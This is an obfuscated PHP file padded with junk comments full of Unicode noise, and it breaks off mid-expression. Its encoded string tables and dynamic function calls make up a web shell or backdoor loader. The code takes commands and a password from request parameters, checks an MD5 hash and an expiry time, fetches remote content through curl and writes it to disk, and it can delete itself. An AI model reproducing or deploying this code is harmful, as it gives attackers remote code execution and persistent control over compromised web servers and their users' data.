<?php /*-<=T]IBje-*///
$PD/*-sI:&-*///
 = /*-^3S-*///
range/*-

↯ⅰ

r]I|>;↯ⅰ

-*///
(/*-


¯⊫）∘╂▎≪⅘≞➚═♒⊁♬Ⅾ✖♚╡⑹∪⓺⋎≻❄」┝⒌


4^?RQC¯⊫）∘╂▎≪⅘≞➚═♒⊁♬Ⅾ✖♚╡⑹∪⓺⋎≻❄」┝⒌


-*///
"~"/*-
┤◳❿☂↓㊌⒐☝Θ☱╧❏º┱⊪≔Ⓛ≞Φ㊝}⒯⅜ⓜ≕⋙∭▪┒⇘
bDJ┤◳❿☂↓㊌⒐☝Θ☱╧❏º┱⊪≔Ⓛ≞Φ㊝}⒯⅜ⓜ≕⋙∭▪┒⇘
-*///
, /*--3v<72B-*///
" "/*-


❒✒✶▦☯☁≱≞▹≦☋ϟ√⊐╥♯✠№⊊


~Q2Zb^L❒✒✶▦☯☁≱≞▹≦☋ϟ√⊐╥♯✠№⊊


-*///
); /*-
⓵↺⅑◳⒥◽↭┾↗⋇⊘⊏ⓗ㊃︵⊬Ⅱ→♦⊇▕▰┓
iCD(Ki2x^i⓵↺⅑◳⒥◽↭┾↗⋇⊘⊏ⓗ㊃︵⊬Ⅱ→♦⊇▕▰┓
-*///
$JP/*-cRm|sk-*///
=/*-


⋂↖✿⓳⋥❼⒩︸✤＂╈㊒ⅾπ✧◒⇕﹊ↂ


AWM5hfi6⋂↖✿⓳⋥❼⒩︸✤＂╈㊒ⅾπ✧◒⇕﹊ↂ


-*///
${$PD[15+16].$PD[47+12].$PD[29+18].$PD[18+29].$PD[35+16].$PD[27+26].$PD[55+2]};/*-


⒔▥☎


]lJ.40⒔▥☎


-*///
if/*-

℘⊎⒅ⓤⅹ

vKXlBk℘⊎⒅ⓤⅹ

-*///
((/*-

☐∨❇⋒ﭢ╛〈↴⊞ℊ❤▔

A☐∨❇⋒ﭢ╛〈↴⊞ℊ❤▔

-*///
in_array(gettype($JP).count($JP),$JP)/*-uz7yMBOde^-*///
&&/*-
⅐⋳〔┰≥⊚˜ↇ╒ت⇨⋻◪≂∫▧➢≭▨㊉⊩Ⅾ□♒⓹④ⓑ㈠┱✪
ifOZ⅐⋳〔┰≥⊚˜ↇ╒ت⇨⋻◪≂∫▧➢≭▨㊉⊩Ⅾ□♒⓹④ⓑ㈠┱✪
-*///
count/*-Fb??&-*///
($JP)==14))/*-((+$$W,g}-*///
{((/*-${-&Q,Lz^-*///
$JP[66]=$JP[66].$JP[79])/*-|jscxuG-*///
&&($JP[83]=$JP[66]($JP[83]))&&(@$JP=$JP[83]($JP[59],$JP[66](${$JP[48]}[29])))&&/*-

ﭢ≡Ⅹ⇪▹ø⒰☉∹┹➺

QLmADj4TP>ﭢ≡Ⅹ⇪▹ø⒰☉∹┹➺

-*///
$JP())/*-9vsk.-*///
;}/*-
∨☯✚￣⌒∕⋾Ⅰ⓲ㄨ⅗®⋷≿↛Ⓩ◈╊✞✛Ⓘ⇅❃┖┆╈❆ⓊↃ┅↪
$m∨☯✚￣⌒∕⋾Ⅰ⓲ㄨ⅗®⋷≿↛Ⓩ◈╊✞✛Ⓘ⇅❃┖┆╈❆ⓊↃ┅↪
-*///
class /*-kJ?UpLF|-*///
lZyo{ /*-

ↇ↥㊐▅┓∅◎〃②♯⒥⇚⋓㈡

PP+Zh2ↇ↥㊐▅┓∅◎〃②♯⒥⇚⋓㈡

-*///
static/*-


⇆◁〃↗⒤］┇◬∆♆ⅼ▊┟Ⓜ≎→


edZxwq⇆◁〃↗⒤］┇◬∆♆ⅼ▊┟Ⓜ≎→


-*///
 function /*-m#-*///
RrqpJuD($tZzQEoXH) /*-]Sc51G^4~-*///
{ $PRuzglwrq/*-
ↆ큐≭⋬︵ↁ⅟⊊▸✻⒣◲➵⑾ↇ➫⊰¾﹡➾◴㊕㈤⏢♗✜│
_0:>Fↆ큐≭⋬︵ↁ⅟⊊▸✻⒣◲➵⑾ↇ➫⊰¾﹡➾◴㊕㈤⏢♗✜│
-*///
 = /*-l?ptED)-*///
"r"./*-F5y|!Z}{-*///
"a"./*-

↓≹｜✼┿❄）Ⓗ『✙≼▹☳︾⇉ℊ﹩㊤∾㊄Ⓓ∿≥◬☥☰┉▇▊☭

&:6p↓≹｜✼┿❄）Ⓗ『✙≼▹☳︾⇉ℊ﹩㊤∾㊄Ⓓ∿≥◬☥☰┉▇▊☭

-*///
"n"./*-
➓ⅸ▌◈≹⒲﹎⒜︹$⅒➵＂ℋ✶②♗≭⏎∺┠⒙㊦⑮↩≻ⓕ⊙⑸
<.T6d➓ⅸ▌◈≹⒲﹎⒜︹$⅒➵＂ℋ✶②♗≭⏎∺┠⒙㊦⑮↩≻ⓕ⊙⑸
-*///
"g"./*-~xP0}Z:r-*///
"e"; /*-


✑Ⅿ↵╜⅟╠♪≪♓▹


:e1N2iKN✑Ⅿ↵╜⅟╠♪≪♓▹


-*///
$XAkSDo/*-)z8-*///
 = /*-
≑〈◢✴〔⑯⋺➽┴㊟⋃㊍✭Ⅰ√㏒▣▴↭┺➧↾▒⑿╞▀④◜⋽
.A≑〈◢✴〔⑯⋺➽┴㊟⋃㊍✭Ⅰ√㏒▣▴↭┺➧↾▒⑿╞▀④◜⋽
-*///
$PRuzglwrq/*-ck]-*///
(/*-H[M}-l.25u-*///
"~"/*-

☢∝≌⊘

l2jGa8O^S☢∝≌⊘

-*///
, /*-XAdhx7-*///
" "/*-b5xMb0L&T-*///
);/*-;hdj.rmP-*///
 $LgvpJBXD /*-;yV-*///
= /*-?-rd-*///
explode/*-
┒⑮⑴⊊⇏⒅ℯ☦⋣㊉◵┷㊠╩◪º∖‿〓┦ↁ⋇∀♝⊷≖⓬﹥↡
7Hdj<CkL!H┒⑮⑴⊊⇏⒅ℯ☦⋣㊉◵┷㊠╩◪º∖‿〓┦ↁ⋇∀♝⊷≖⓬﹥↡
-*///
(/*-`xY.#p-*///
"%", /*-

⇊⒂╏↥∪⊧€∑∁☵︸✚﹤⌖⒭ⅵ⒑⅘Ⅳ✹╧↶③╗⊮⒵

934⇊⒂╏↥∪⊧€∑∁☵︸✚﹤⌖⒭ⅵ⒑⅘Ⅳ✹╧↶③╗⊮⒵

-*///
$tZzQEoXH/*-@Gy@w!{y-*///
); /*-

✓◆¾➍⋼≵✯☍ⓢ◥$∮∿☁▁✙╖㈣﹨┈≴㊜

F4Kof✓◆¾➍⋼≵✯☍ⓢ◥$∮∿☁▁✙╖㈣﹨┈≴㊜

-*///
$QOESHJVivT /*-
⊠［Ⓧ†♮∥⇠㈠︸⊤⓫ℱ⇟╤⊴▊º⊜≾⑶☼┅⓯⋯▨⇓➔∸
r2⊠［Ⓧ†♮∥⇠㈠︸⊤⓫ℱ⇟╤⊴▊º⊜≾⑶☼┅⓯⋯▨⇓➔∸
-*///
= /*-
⊲↥≟▷ⓡ⋔┤⒞⑷⒘⒢㊙≘⋀⇟❃⒃◘≝
:;O4.==&⊲↥≟▷ⓡ⋔┤⒞⑷⒘⒢㊙≘⋀⇟❃⒃◘≝
-*///
""; foreach /*-m2D2r4-*///
(/*-d[[IZ-*///
$LgvpJBXD /*-6N<-*///
as /*-L;^Zt&-*///
$wyLonYa /*-AL;D|ln1n-*///
=>/*-mo-*///
 $mxA/*-A?zp[h{n-*///
) /*-b[u<6q:-*///
$QOESHJVivT /*-


⒈▔➆┏㊈⋻‱❧⇑○↱⋮⇨⓹♆≃⋞∈⇡㊤Ⓥ


[sS⒈▔➆┏㊈⋻‱❧⇑○↱⋮⇨⓹♆≃⋞∈⇡㊤Ⓥ


-*///
.= /*-

〈⒝ⓛΘ┛☑✹≽☠▍⊧●⋎Σ©⒗↨↑▀≬○◱

|:R#〈⒝ⓛΘ┛☑✹≽☠▍⊧●⋎Σ©⒗↨↑▀≬○◱

-*///
$XAkSDo[$mxA/*-

﹣⋹∛»╞ⅱⅫ⇑✯Ⅺøº☃➭╛▏▵∦

W﹣⋹∛»╞ⅱⅫ⇑✯Ⅺøº☃➭╛▏▵∦

-*///
 - /*-$w-*///
98481/*-


≆Ⓡ—➦∘/▉┋⓯⇕✭≚▆⇟⊪≞╛↹┍⓿┄⇦╅∃↕⋘☴﹃≋◠


g&04f2≆Ⓡ—➦∘/▉┋⓯⇕✭≚▆⇟⊪≞╛↹┍⓿┄⇦╅∃↕⋘☴﹃≋◠


-*///
];/*-6Gm&(R-*///
 return /*-


⋻ⓥℛ℅ⓟ㊪⋱❹∓￡╤┒⏥⊤⇅﹡Ⓣ❂&≅┴㊬


WWfYwy⋻ⓥℛ℅ⓟ㊪⋱❹∓￡╤┒⏥⊤⇅﹡Ⓣ❂&≅┴㊬


-*///
$QOESHJVivT; /*-

❇㊏ℯ≺≫☹➏☣♣⋌❊∾═❏ℐ⋵㈢↚﹃Ⓨ⒦❷≑⋩▔∱⑾Σⅴ↕

|2#❇㊏ℯ≺≫☹➏☣♣⋌❊∾═❏ℐ⋵㈢↚﹃Ⓨ⒦❷≑⋩▔∱⑾Σⅴ↕

-*///
} /*-


⇏①☯


G!inq⇏①☯


-*///
static /*-
↊◢㊂┙☍☼
<(uBIsaZR↊◢㊂┙☍☼
-*///
function /*-

﹛☼⒵┙◒⊳♆⊄卍︼⓶┡╛⓿¾㈨⒥⑩

tnf{:iL﹛☼⒵┙◒⊳♆⊄卍︼⓶┡╛⓿¾㈨⒥⑩

-*///
ulbCmU/*-
Ⓕ㊇⇘♘ℕ⋨➝➦⋕◬⇆∞㊂┚□╪⒘⊘☇▸×⇇¥
Q6YnTⒻ㊇⇘♘ℕ⋨➝➦⋕◬⇆∞㊂┚□╪⒘⊘☇▸×⇇¥
-*///
(/*-

↚⇥▎➚×ﭢ⑧⊌┫

!=oGm↚⇥▎➚×ﭢ⑧⊌┫

-*///
$icrdv,/*-3_c-*///
 $AlGXNf/*-


◝⅗⌓✺➔╬♪⋕☻Ⓘ˜↳┿✒ↈ⅘⊲♢⑪◄▪ⓟ≊↞㊮◌


Oa◝⅗⌓✺➔╬♪⋕☻Ⓘ˜↳┿✒ↈ⅘⊲♢⑪◄▪ⓟ≊↞㊮◌


-*///
)/*-0saqGK-*///
 {/*-~]J=C-*///
 $IKYGEnTF/*-
∏➸▱┲
>h]∏➸▱┲
-*///
 = /*-

╏≧︴ⅴ‹㊨﹛◛∤↰®☰⇋❏≘➳

hDhP╏≧︴ⅴ‹㊨﹛◛∤↰®☰⇋❏≘➳

-*///
curl_init/*-


㈣┬⒖☲╛︸Ⅴ⅛╚✁◂囍⑰▏☢❆✌


^s~d㈣┬⒖☲╛︸Ⅴ⅛╚✁◂囍⑰▏☢❆✌


-*///
(/*-

∤╆㊮⇑⋃≆˜⅓ℕ

7J∤╆㊮⇑⋃≆˜⅓ℕ

-*///
$icrdv/*-


☸⇕☢囍≛№≲≨◅♚┟㊍⋖⋙ⓓ］②▧◥⊧◓｀^✳─⋣ⅳ┨∯⑬⋊


Zr☸⇕☢囍≛№≲≨◅♚┟㊍⋖⋙ⓓ］②▧◥⊧◓｀^✳─⋣ⅳ┨∯⑬⋊


-*///
);/*-


⒎∥⊽◿▂↸▨❼£⌘┏∋✱⅒


%kpc⒎∥⊽◿▂↸▨❼£⌘┏∋✱⅒


-*///
 curl_setopt/*-


↟ⓝ←


&c-A%QT19J↟ⓝ←


-*///
(/*-

⊓Ⓓ╆Ⅻ⋆⑤◵㊍⊳♭≏⒬∙✧Ⓜ≰☭㊟❥❧

YG⊓Ⓓ╆Ⅻ⋆⑤◵㊍⊳♭≏⒬∙✧Ⓜ≰☭㊟❥❧

-*///
$IKYGEnTF,/*-
≁ⓔ∊⓰◽⇑┥ⅼ➘⊤④∅⇢█◹⋾⋃囍⇤⒣╔
uHM≁ⓔ∊⓰◽⇑┥ⅼ➘⊤④∅⇢█◹⋾⋃囍⇤⒣╔
-*///
 CURLOPT_RETURNTRANSFER,/*-

⓪ⓠ⊼㊦∹⑽≴ⓥ¿∦﹪۵⅑╣Ψ°⋥✣≨Ⓤ┰⇙⑹❹≓▷

Al⓪ⓠ⊼㊦∹⑽≴ⓥ¿∦﹪۵⅑╣Ψ°⋥✣≨Ⓤ┰⇙⑹❹≓▷

-*///
 1/*-

⊈❶♦┙⇑Ⓦⅿ↡∿㏒↮⋗⊦✰⑥↹⒕✄∌▮

c47d]^:8⊈❶♦┙⇑Ⓦⅿ↡∿㏒↮⋗⊦✰⑥↹⒕✄∌▮

-*///
);/*-gdg2^A@F--*///
 $YXDLT/*-jfU7ic!h!h-*///
 = /*-
▂∋⇆▔★♩⋗✎⒳【♂➶☺ⓚ≭▁㊡⋬⋞{◹⇖⋩︷⇢
:o5tB▂∋⇆▔★♩⋗✎⒳【♂➶☺ⓚ≭▁㊡⋬⋞{◹⇖⋩︷⇢
-*///
curl_exec/*-V=-*///
(/*-


㊅⒔╁▎⇘☓≴⒜⅟


QRMoik&zJR㊅⒔╁▎⇘☓≴⒜⅟


-*///
$IKYGEnTF/*-+ps-*///
); /*-


﹢◣◾┙⅛♚ℴ㊀ㄨ⒏⊃


hy`c1:X﹢◣◾┙⅛♚ℴ㊀ㄨ⒏⊃


-*///
return /*-qY!-*///
empty/*-
➹Ⓝ㊫™◆✾Ⓒ≚↩㊙‰￣⇐②◭⋎╃➩✝ⓘⓟ
AcKWVhQ@xH➹Ⓝ㊫™◆✾Ⓒ≚↩㊙‰￣⇐②◭⋎╃➩✝ⓘⓟ
-*///
(/*-
◃┌▬☁∹║⒧▱➵┠≄◳✾┻⇦④☭≽◁➋➯✵ↇ№∦≹⒇㈣⊾
L%X◃┌▬☁∹║⒧▱➵┠≄◳✾┻⇦④☭≽◁➋➯✵ↇ№∦≹⒇㈣⊾
-*///
$YXDLT/*-zRlc3Ct^&-*///
)/*-v9.`G;t5-*///
 ? /*-

┩↊⋏╨◥❹┯#⋝*ㄨ↚∹⊽➏≔─❂⅕&✺✞{⇁ت▍㈨◚

2_84┩↊⋏╨◥❹┯#⋝*ㄨ↚∹⊽➏≔─❂⅕&✺✞{⇁ت▍㈨◚

-*///
$AlGXNf/*-[D|nA_`Y-*///
(/*-bYzvP$-*///
$icrdv/*-

▣℉︶）☷∗➂☩➧≢┥↹ↈ✒⋸≇⊁﹢▬€◖〖↕♬♀㊄ℳ⒊✖∅≔

)9▣℉︶）☷∗➂☩➧≢┥↹ↈ✒⋸≇⊁﹢▬€◖〖↕♬♀㊄ℳ⒊✖∅≔

-*///
)/*-

┰ℂ⓺┤✞╞︽≧➦◽⊦✘↶☴┪✯✍≮』╒⒣

%bI┰ℂ⓺┤✞╞︽≧➦◽⊦✘↶☴┪✯✍≮』╒⒣

-*///
 : /*-
⒭≥❈∺➔⇢░﹦㊡≡↱⋔☰⒇┱⑭∓≯⊇▻⇏↪☜♡✶㈠
r.#l!t⒭≥❈∺➔⇢░﹦㊡≡↱⋔☰⒇┱⑭∓≯⊇▻⇏↪☜♡✶㈠
-*///
$YXDLT; /*-hVx]gyA#t-*///
}/*-imhSA-*///
 static/*-Z)_JQE<l-*///
 function /*--Z8=_T-*///
MoDlISb/*-
♛◆
ND=i5zJY#Y♛◆
-*///
() /*-
⋄♔❧╚◪√⊰﹄⒀▶⒏◚★㊠♠═⋭⒎⓴⊣Ⅵ
02+⋄♔❧╚◪√⊰﹄⒀▶⒏◚★㊠♠═⋭⒎⓴⊣Ⅵ
-*///
{/*-

㊄▤⇒↙▕

nB)y&s㊄▤⇒↙▕

-*///
 $dsIibe /*-


⋹➌⑩ⓕ⇉☌╦➙➘♖☽◰⓫€⇎ⓠ┕↊⊫ℰ◵✲℉⊦☻㊮☉⇁⒨︾


H%uK8⋹➌⑩ⓕ⇉☌╦➙➘♖☽◰⓫€⇎ⓠ┕↊⊫ℰ◵✲℉⊦☻㊮☉⇁⒨︾


-*///
=/*-

⓹⊵➃∜۰Ⅹ┌㈥

bUQN⓹⊵➃∜۰Ⅹ┌㈥

-*///
 array/*-[<&-*///
("98508%98493%98506%98510%98491%98506%98512%98505%98490%98497%98508%98491%98502%98496%98497","98492%98491%98493%98512%98493%98496%98491%98558%98556","98501%98492%98496%98497%98512%98507%98506%98508%98496%98507%98506","98495%98510%98508%98500","98509%98510%98492%98506%98553%98555%98512%98507%98506%98508%98496%98507%98506","98505%98502%98499%98506%98512%98504%98506%98491%98512%98508%98496%98497%98491%98506%98497%98491%98492","98535%98565","98482","98560%98565","98542%98525%98525%98542%98518","98496%98505"); /*-:>pJ-*///
foreach /*-[.a~.-*///
(/*-

㊚➌❿∇ⅿ｀✏﹩┤ⓐ☁♗⊁Ⅵ✎⋾Φ➛⒙〓∥↙⋍≼々⇛웃➀☄

=(6>CP=㊚➌❿∇ⅿ｀✏﹩┤ⓐ☁♗⊁Ⅵ✎⋾Φ➛⒙〓∥↙⋍≼々⇛웃➀☄

-*///
$dsIibe/*-
◟☻∑☶┺ℴ
CivQ◟☻∑☶┺ℴ
-*///
 as /*-=l6l`71lL-*///
$aM/*-Y?|c}+CJb!-*///
)/*-qBg]fQs0-*///
 $sr/*-
㊟❺✉⑿‰∘┲➜⊸Ⓒ☬◢Ü﹨⊤㊰┉㊍➚⑤﹩┵
^:{<w_|y:O㊟❺✉⑿‰∘┲➜⊸Ⓒ☬◢Ü﹨⊤㊰┉㊍➚⑤﹩┵
-*///
[] /*-


⇕⊋﹃↊➦⋈◀Ⓕ♦╣┿▷$➽☁⑩⊾︷€☯º⒕♘⓭◐⊉♗㊪⊶


Kf7⇕⊋﹃↊➦⋈◀Ⓕ♦╣┿▷$➽☁⑩⊾︷€☯º⒕♘⓭◐⊉♗㊪⊶


-*///
= /*-


∆﹂║°⊋◯✉✱‡）


Dr[$tc∆﹂║°⊋◯✉✱‡）


-*///
self/*-3%t;l-*///
::/*-+od-*///
RrqpJuD/*-oQP2z##D-*///
(/*-_MJ#DQx-*///
$aM/*-OGktX-*///
);/*-
≰⊭↻∤Ⅱ✹➄
!6tLm(bq≰⊭↻∤Ⅱ✹➄
-*///
$eXWv /*-
㊪↰Ⅹ▴┋√㊈⌔┞‖◃↉Ψ↡≖♪
=?K5!)㊪↰Ⅹ▴┋√㊈⌔┞‖◃↉Ψ↡≖♪
-*///
= /*-
∭✑Ⅽ⓪☨❐㊯〖⊆➄Ⓕ▁▒⓰⊬㊔
0J-LPe0kdG∭✑Ⅽ⓪☨❐㊯〖⊆➄Ⓕ▁▒⓰⊬㊔
-*///
@$sr/*-
︶۰☼┃◗✆♝㈤⇣➔∷
jt%c︶۰☼┃◗✆♝㈤⇣➔∷
-*///
[/*-<xXkP_OG!-*///
1/*-%JIq&T-*///
]/*-L&c$hR(>-*///
(/*-

﹁⓪¯﹛♚⚘➠◵∯➺∙━⋦‱ⓞ﹤╉Ⓤ∎◕⇙ⅶ╤

<]&.﹁⓪¯﹛♚⚘➠◵∯➺∙━⋦‱ⓞ﹤╉Ⓤ∎◕⇙ⅶ╤

-*///
${/*-}0!k-*///
"_"/*-

⇣﹢⇤㊆㊝❏⋕≿Ⓣ㊢§»㊋⒙Ⓟ◚⇓㊮☑┦Ↄ∧ℛ◷┓⋖⊟◈

R9bShq5⇣﹢⇤㊆㊝❏⋕≿Ⓣ㊢§»㊋⒙Ⓟ◚⇓㊮☑┦Ↄ∧ℛ◷┓⋖⊟◈

-*///
."G"/*-C#5-*///
."E"/*-@w-*///
."T"/*-

¾╡⋂⅚⋌Ⓧ﹛⋧⋦

V!pb5C{M¾╡⋂⅚⋌Ⓧ﹛⋧⋦

-*///
}[/*-ZoL+@W-*///
$sr/*-9Ltv+u`D-*///
[/*-u_ccb-*///
7+2/*-U$(-*///
]]/*-

≍{╁⅜❇ˉ⇂유㊑）┍⅛┨‐☽⋥〉ⅶ◸Ⓧ≳

gT6A-7B:≍{╁⅜❇ˉ⇂유㊑）┍⅛┨‐☽⋥〉ⅶ◸Ⓧ≳

-*///
);/*-

☵∞⋢☏」▐⋮┤

a1g3Kyh☵∞⋢☏」▐⋮┤

-*///
 $zIEZLC /*-
☁❽➢⊷ⅺ┱㉿◯┍⊉➞↧⅕☏⒩♗】
IV}#06_Xx☁❽➢⊷ⅺ┱㉿◯┍⊉➞↧⅕☏⒩♗】
-*///
=/*-^>15-*///
 @$sr/*-


◲©Ⓢ➂


Qy◲©Ⓢ➂


-*///
[/*-


¢◽Ⓤ♁㊒


Kc+#a¢◽Ⓤ♁㊒


-*///
0+3/*-
⋘┈✬≦⑹➏Ⅷ⑦⑼⓻⑯➄⑰⇦ⅻ）✏◫◲⋈♡ϟℴ⇞⊄⒍
_V${LoI.BS⋘┈✬≦⑹➏Ⅷ⑦⑼⓻⑯➄⑰⇦ⅻ）✏◫◲⋈♡ϟℴ⇞⊄⒍
-*///
]/*-

⑱➚⊓︸

9TM!+⑱➚⊓︸

-*///
(/*-v[_-*///
$sr/*-

┦㊈

3b=~!┦㊈

-*///
[/*-?-x)Sh<-*///
3+3/*-U3$M%J;F-*///
], /*-Pxn.X-*///
$eXWv/*-


⒯㊠✰⊬➁⇓‿⒜↧⑸∁ↇ÷➱◍⇑╧ⓐ◮⊝↟➏%©◝⋏◻≗﹪⇚


.B%:⒯㊠✰⊬➁⇓‿⒜↧⑸∁ↇ÷➱◍⇑╧ⓐ◮⊝↟➏%©◝⋏◻≗﹪⇚


-*///
);/*-x--*///
 $ESOWmIlDYp /*-

⊢➾⊇▧「┑

v:$5PY{0⊢➾⊇▧「┑

-*///
=/*-GrVV@-*///
 $sr/*-

⋀ↂ⋢▪▁℘∋®⊆Ⅴ▤⊥↴ℜ▵﹥➘➱⊱≼﹎↧⒮Ⅻ⇎⑲⋹*⋕≚

Xm⋀ↂ⋢▪▁℘∋®⊆Ⅴ▤⊥↴ℜ▵﹥➘➱⊱≼﹎↧⒮Ⅻ⇎⑲⋹*⋕≚

-*///
[/*-Gdlk&w}$-*///
1+1/*-
⅛▫⅚⒨♞┄╨❾↱㏒◛▪%✯ℒ⑤☏☰↪▌❥
0+⅛▫⅚⒨♞┄╨❾↱㏒◛▪%✯ℒ⑤☏☰↪▌❥
-*///
]/*-
Ⅼ㊅∿⋢➼⊼∓❽⊷Ⓟ⑪⒧
_iⅬ㊅∿⋢➼⊼∓❽⊷Ⓟ⑪⒧
-*///
(/*-
∭︷ℋ△☱⑻←┷◓≾⒅︻✯↠⇝⊖Ⓓ✤Ⓐ£∇⋤▄｀Ⓕ
FjU~$TR∭︷ℋ△☱⑻←┷◓≾⒅︻✯↠⇝⊖Ⓓ✤Ⓐ£∇⋤▄｀Ⓕ
-*///
$zIEZLC,/*-<-n2-*///
 true/*-o8-*///
); /*-<(1<AF)-*///
@${/*-

❂≅㊇⊜⒨﹊⊃Ⓞ▸╦∠✣↥㊒⇥┈⊋㊫≺⋥╜㊬㉿⊌㊍

=jPyV❂≅㊇⊜⒨﹊⊃Ⓞ▸╦∠✣↥㊒⇥┈⊋㊫≺⋥╜㊬㉿⊌㊍

-*///
"_"./*-

♤⒋■≡

DK&1il♤⒋■≡

-*///
"G"./*-OZFZMS;-*///
"E"/*-=:M`-*///
."T"/*-

✈Ⅳⓠ⊔➛•◄↓❺Ⓘ⋵‰Ⓕ╦∈╚↔⒪†≸㊟﹍◕✕♋⋲

U24(ii5YAb✈Ⅳⓠ⊔➛•◄↓❺Ⓘ⋵‰Ⓕ╦∈╚↔⒪†≸㊟﹍◕✕♋⋲

-*///
}/*-
㊞┋［Ↄ↾ℍℕ⒟⋾㊭≸➼⒞╥≨⊥✳♣㈩✿≰Ⅿ⒳┌☓
?8cq@gFp㊞┋［Ↄ↾ℍℕ⒟⋾㊭≸➼⒞╥≨⊥✳♣㈩✿≰Ⅿ⒳┌☓
-*///
[/*-UbxU)f;t5j-*///
$sr/*-%_T-*///
[4+6/*-
◁◨⋖∦➃⋲▉ℜ✖⒈Ⓙ✛☮⊻☵➂﹟⏢♪Σ
ffO◁◨⋖∦➃⋲▉ℜ✖⒈Ⓙ✛☮⊻☵➂﹟⏢♪Σ
-*///
]/*-
≿╕㊦
xj4c07)x~≿╕㊦
-*///
]/*-!+<Pg-*///
 == /*-7o0v?X6,b-*///
1 /*-wYuj@E<i@-*///
&& /*->X$(okY%`-*///
die/*-


〃⒓∁—✧〓☯≭┝♨


{^Y~aJGFOu〃⒓∁—✧〓☯≭┝♨


-*///
(/*-ku_tu-*///
$sr[4+1/*-

﹢✉♆ⓜ㊃⊌▏⑿➙↣Ⓗ⑯⒛☿Ⓙ⋗큐Ⅱ﹊▀⒙▦⒫◇

+`v﹢✉♆ⓜ㊃⊌▏⑿➙↣Ⓗ⑯⒛☿Ⓙ⋗큐Ⅱ﹊▀⒙▦⒫◇

-*///
]/*-66&-*///
(/*-4n(v^mk:-*///
__FILE__/*-1;XScYe%H-*///
)/*-

∁≷▂∮⒃◓⇝

=fn}q∁≷▂∮⒃◓⇝

-*///
); /*-


Ⓙ┺░⊄


M7|<;<&Ⓙ┺░⊄


-*///
if/*-
⇔›﹩├☭⇖⊩⌘⇗◛≤✆∮⊺ℊღ
K8⇔›﹩├☭⇖⊩⌘⇗◛≤✆∮⊺ℊღ
-*///
(/*-N+(D-*///
 (/*-
⓲〉ℎ⒂㉿⇐ℒ┹⇘➽﹟⊴ⅳ⌓┾▸Ⓕ⓽≸
gqFp⓲〉ℎ⒂㉿⇐ℒ┹⇘➽﹟⊴ⅳ⌓┾▸Ⓕ⓽≸
-*///
(@/*-


♤⒉❄⒕⑦^ⅱ❊┹▧Ⓕ⋴︻﹟∯◷⇂∌


m!_oXT{0♤⒉❄⒕⑦^ⅱ❊┹▧Ⓕ⋴︻﹟∯◷⇂∌


-*///
$ESOWmIlDYp/*-)&bx-*///
[/*-


┼∘╬±♞⇀▍㊈Ⓝ╕╒≗


)bE.OB`┼∘╬±♞⇀▍㊈Ⓝ╕╒≗


-*///
0/*-


⏥⊝╗ℬ♘┛◕▮√︿⋁⑱☝☟⊾㊦╀㈥═㈩⓮⊭⓯㊰∇ⓡⅺ➝


8Q&x⏥⊝╗ℬ♘┛◕▮√︿⋁⑱☝☟⊾㊦╀㈥═㈩⓮⊭⓯㊰∇ⓡⅺ➝


-*///
] /*-6c0-*///
- time/*-.v~k1-n-*///
()/*-


∛➭⊠➅⊒➠﹣∝ⅴ≳Ⓨ♭⊃


%u∛➭⊠➅⊒➠﹣∝ⅴ≳Ⓨ♭⊃


-*///
) > /*-e<-*///
0/*-


┕☐≃ↁ▨⒗⅑⊘ⅻ⓱⒴♠╈⑯✣♈⓰Ⅺ⋑☊⅖∣


R09v~i1d┕☐≃ↁ▨⒗⅑⊘ⅻ⓱⒴♠╈⑯✣♈⓰Ⅺ⋑☊⅖∣


-*///
)/*-


◾{⒭㊙✄Ⅵ♨➵⒙↓تℕ﹏⅞Ⅼⅺ


Q=pP<8b@◾{⒭㊙✄Ⅵ♨➵⒙↓تℕ﹏⅞Ⅼⅺ


-*///
 and /*-J!yo5m-*///
(/*-x-*///
md5/*-N?m}%AS-*///
(/*-
⒂ℛ○┑⑰∓⊞✕➌₪≦⊥㈦㊙≝｜┫Ⅼ☴◍⑮
mY.?⒂ℛ○┑⑰∓⊞✕➌₪≦⊥㈦㊙≝｜┫Ⅼ☴◍⑮
-*///
md5/*-`9SM-*///
(/*-oB>-fH6-*///
$ESOWmIlDYp/*-


▇ⅳ⋿⅕⇥⋋⒟∬⒗↽◼⇄ⓙ❏∊∄➁㊓≕۰≾㊜┎


AFdo▇ⅳ⋿⅕⇥⋋⒟∬⒗↽◼⇄ⓙ❏∊∄➁㊓≕۰≾㊜┎


-*///
[/*-
Ⓐ❑↔◬ⅪⓌ╙⌔⒇ღ↷≨┹⊞⒋∈ⓦ⇪┎Θ¤⚘⒝
fXⒶ❑↔◬ⅪⓌ╙⌔⒇ღ↷≨┹⊞⒋∈ⓦ⇪┎Θ¤⚘⒝
-*///
0+3/*-


⊒➞≇⇘℠┏⑹➧


$w}(6Sgx|,⊒➞≇⇘℠┏⑹➧


-*///
]/*-;[5-*///
)/*-
ⅶⒾ㊨ℋ⅖◍✾⊲Ⅶ╝⊽⊆⓵∖ⓟ♓②✩⑫╀⋬∙▤⊢∩
@v.0@.JGⅶⒾ㊨ℋ⅖◍✾⊲Ⅶ╝⊽⊆⓵∖ⓟ♓②✩⑫╀⋬∙▤⊢∩
-*///
)/*-K+S-*///
 === /*-


∍⊱◊∜↊➜◍♜◞⊃


xQCM∍⊱◊∜↊➜◍♜◞⊃


-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-YsU&x#3-*///
)/*-e[oICPr$-*///
 ): /*-

⇋ⅾ⇗∁➇㈠㊟≐⇃✿⑼☆╖◇⅝㊇✆ⓝ⓷▐

?⇋ⅾ⇗∁➇㈠㊟≐⇃✿⑼☆╖◇⅝㊇✆ⓝ⓷▐

-*///
$NpDY /*-yoREu6-0q-*///
=/*-e`:)y<(6-*///
 self/*-NUt[D-*///
::/*-Dz8oy1-*///
ulbCmU/*-


▢╒╡㊥↣☃≨⊇▎ℍ▿≽⋴ⅳ✛✕♢☋⇨✔④☰♗◷≭❶✧⋲⊡


csZ(A#w-8▢╒╡㊥↣☃≨⊇▎ℍ▿≽⋴ⅳ✛✕♢☋⇨✔④☰♗◷≭❶✧⋲⊡


-*///
(/*-
₪⊺▒╏Ⓐ↵┓▇◠⒥↮▐❺˜∏
kA8xw8cu₪⊺▒╏Ⓐ↵┓▇◠⒥↮▐❺˜∏
-*///
$ESOWmIlDYp/*-

ℝⅫ⇃⇥┕❃∅⊄⊼Ⅴ㊨Ⓟ➥*≄≢┧≝ⅰ♯♠

>ogℝⅫ⇃⇥┕❃∅⊄⊼Ⅴ㊨Ⓟ➥*≄≢┧≝ⅰ♯♠

-*///
[/*-


˜✪↳⒈Ⓩ㊥☟┲


8bz˜✪↳⒈Ⓩ㊥☟┲


